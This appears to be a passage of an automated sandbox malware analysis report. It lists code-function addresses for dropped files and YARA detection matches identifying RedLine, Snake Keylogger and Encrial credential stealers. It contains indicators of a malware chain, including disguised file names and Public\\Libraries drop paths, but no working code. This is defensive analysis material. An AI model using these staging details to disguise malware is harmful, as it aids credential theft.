                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_2_004028B07_2_004028B0
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_2_0041A4BE7_2_0041A4BE
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_2_004182447_2_00418244
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_2_004016507_2_00401650
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_2_00402F207_2_00402F20
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_2_004193C47_2_004193C4
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_2_004187887_2_00418788
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_2_00402F897_2_00402F89
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_2_00402B907_2_00402B90
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_2_004073A07_2_004073A0
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_2_256810207_2_25681020
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_2_256810307_2_25681030
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_1_00408C607_1_00408C60
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_1_0040DC117_1_0040DC11
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_1_00407C3F7_1_00407C3F
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_1_00418CCC7_1_00418CCC
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_1_00406CA07_1_00406CA0
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_1_004028B07_1_004028B0
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_1_0041A4BE7_1_0041A4BE
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_1_004182447_1_00418244
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_1_004016507_1_00401650
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_1_00402F207_1_00402F20
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_1_004193C47_1_004193C4
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_1_004187887_1_00418788
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_1_00402F897_1_00402F89
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_1_00402B907_1_00402B90
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_1_004073A07_1_004073A0
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_02D027B99_2_02D027B9
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_02D0C5309_2_02D0C530
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_02D094809_2_02D09480
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_02D0C5219_2_02D0C521
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_02D02DD19_2_02D02DD1
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_02D0946F9_2_02D0946F
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A361389_2_05A36138
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A3BC609_2_05A3BC60
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A3AF009_2_05A3AF00
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A389E09_2_05A389E0
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A385889_2_05A38588
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A345209_2_05A34520
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A3450F9_2_05A3450F
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A385799_2_05A38579
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A374289_2_05A37428
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A374189_2_05A37418
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A3F4489_2_05A3F448
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A3F4589_2_05A3F458
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A3E7409_2_05A3E740
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A3E7509_2_05A3E750
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A356809_2_05A35680
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A3566F9_2_05A3566F
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A3E1809_2_05A3E180
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A381209_2_05A38120
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A3612B9_2_05A3612B
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A381309_2_05A38130
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A3F0009_2_05A3F000
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A313A89_2_05A313A8
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A303209_2_05A30320
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A303309_2_05A30330
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A352289_2_05A35228
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A3521B9_2_05A3521B
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A34DC09_2_05A34DC0
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A34DD09_2_05A34DD0
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A37CC89_2_05A37CC8
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A30CD89_2_05A30CD8
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A37CD89_2_05A37CD8
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A3EFF09_2_05A3EFF0
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A36FC39_2_05A36FC3
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A36FD09_2_05A36FD0
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A389D09_2_05A389D0
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A349699_2_05A34969
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A349789_2_05A34978
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A3F8A19_2_05A3F8A1
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A3F8B09_2_05A3F8B0
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A378809_2_05A37880
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A378719_2_05A37871
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A3EBA89_2_05A3EBA8
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A3EB989_2_05A3EB98
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A30AB89_2_05A30AB8
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A35ACB9_2_05A35ACB
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 9_2_05A35AD89_2_05A35AD8
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0318B49010_2_0318B490
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0318B47010_2_0318B470
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 14_2_028320C414_2_028320C4
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_2_00408C6018_2_00408C60
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_2_0040DC1118_2_0040DC11
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_2_00407C3F18_2_00407C3F
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_2_00418CCC18_2_00418CCC
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_2_00406CA018_2_00406CA0
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_2_004028B018_2_004028B0
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_2_0041A4BE18_2_0041A4BE
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_2_0041824418_2_00418244
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_2_0040165018_2_00401650
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_2_00402F2018_2_00402F20
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_2_004193C418_2_004193C4
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_2_0041878818_2_00418788
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_2_00402F8918_2_00402F89
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_2_00402B9018_2_00402B90
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_2_004073A018_2_004073A0
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_2_1D64102218_2_1D641022
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_2_1D64103018_2_1D641030
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_2_20C147A818_2_20C147A8
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_2_20C147B818_2_20C147B8
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_1_00408C6018_1_00408C60
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_1_0040DC1118_1_0040DC11
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_1_00407C3F18_1_00407C3F
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_1_00418CCC18_1_00418CCC
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_1_00406CA018_1_00406CA0
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_1_004028B018_1_004028B0
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_1_0041A4BE18_1_0041A4BE
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_1_0041824418_1_00418244
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_1_0040165018_1_00401650
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_1_00402F2018_1_00402F20
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_1_004193C418_1_004193C4
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_1_0041878818_1_00418788
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_1_00402F8918_1_00402F89
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_1_00402B9018_1_00402B90
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_1_004073A018_1_004073A0
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 20_2_028020C420_2_028020C4
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_2_00408C6023_2_00408C60
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_2_0040DC1123_2_0040DC11
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_2_00407C3F23_2_00407C3F
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_2_00418CCC23_2_00418CCC
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_2_00406CA023_2_00406CA0
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_2_004028B023_2_004028B0
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_2_0041A4BE23_2_0041A4BE
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_2_0041824423_2_00418244
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_2_0040165023_2_00401650
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_2_00402F2023_2_00402F20
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_2_004193C423_2_004193C4
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_2_0041878823_2_00418788
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_2_00402F8923_2_00402F89
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_2_00402B9023_2_00402B90
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_2_004073A023_2_004073A0
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_2_2DB6103023_2_2DB61030
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_2_2DB6102023_2_2DB61020
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_2_311847B823_2_311847B8
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_2_311847A823_2_311847A8
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_1_00408C6023_1_00408C60
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_1_0040DC1123_1_0040DC11
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_1_00407C3F23_1_00407C3F
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_1_00418CCC23_1_00418CCC
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_1_00406CA023_1_00406CA0
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_1_004028B023_1_004028B0
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_1_0041A4BE23_1_0041A4BE
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_1_0041824423_1_00418244
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_1_0040165023_1_00401650
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_1_00402F2023_1_00402F20
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_1_004193C423_1_004193C4
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_1_0041878823_1_00418788
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_1_00402F8923_1_00402F89
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_1_00402B9023_1_00402B90
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_1_004073A023_1_004073A0
                            Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\rpkhzpuO.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: String function: 0283480C appears 619 times
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: String function: 0280480C appears 619 times
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: String function: 028046A4 appears 154 times
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: String function: 028487A0 appears 48 times
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: String function: 028346A4 appears 154 times
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: String function: 028187A0 appears 48 times
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 027C46A4 appears 244 times
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 027C44D0 appears 32 times
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 027C44AC appears 73 times
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 027D8824 appears 45 times
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 027C480C appears 931 times
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 027D87A0 appears 54 times
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: String function: 0040FB9C appears 60 times
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: String function: 0040D606 appears 144 times
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: String function: 0040E1D8 appears 264 times
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: String function: 00415639 appears 36 times
                            Source: 7.2.rpkhzpuO.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 7.1.rpkhzpuO.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 23.1.rpkhzpuO.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                            Source: 7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 7.2.rpkhzpuO.pif.26b351f0.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                            Source: 23.1.rpkhzpuO.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 7.2.rpkhzpuO.pif.26b351f0.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 7.2.rpkhzpuO.pif.26b351f0.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                            Source: 7.2.rpkhzpuO.pif.26b351f0.10.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 18.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 9.0.Microsofts.exe.b70000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                            Source: 9.0.Microsofts.exe.b70000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 23.2.rpkhzpuO.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 7.2.rpkhzpuO.pif.26b4d410.14.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                            Source: 7.2.rpkhzpuO.pif.26b4d410.14.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 7.2.rpkhzpuO.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 18.2.rpkhzpuO.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 18.2.rpkhzpuO.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 7.2.rpkhzpuO.pif.26b4d410.14.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                            Source: 7.2.rpkhzpuO.pif.26b4d410.14.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 23.2.rpkhzpuO.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 18.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 7.1.rpkhzpuO.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 7.2.rpkhzpuO.pif.26b1cfc0.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                            Source: 7.2.rpkhzpuO.pif.26b1cfc0.11.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                            Source: 00000012.00000001.2160139244.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
